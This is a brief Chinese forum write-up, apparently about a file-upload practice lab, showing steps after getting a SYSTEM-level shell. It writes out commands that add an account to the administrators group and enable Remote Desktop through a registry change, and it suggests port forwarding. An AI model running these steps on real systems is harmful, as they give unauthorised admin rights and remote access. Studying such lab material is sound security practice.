Home > 技术文章投稿区

文件上传靶场权限控制缺陷导致用户直接获取system权限getshell

7142189   ·   发表于 2019-06-06 15:18:09   ·   技术文章投稿区


在上传图片getshell 后  net user  查看 whoami , net



然后添加到管理员组

net localgroup administrators 123


查看3389  netstat -ano |findstr 3389  没有找到,

查看 进程  tasklist  也没有找到


开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


IP是内网的


可以做一个内容端口转发。嘿嘿。


打赏我,让我更有动力~

1 Reply   |  Until 2019-9-10 | 825 View

warlock
发表于 2019-9-10

高明

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.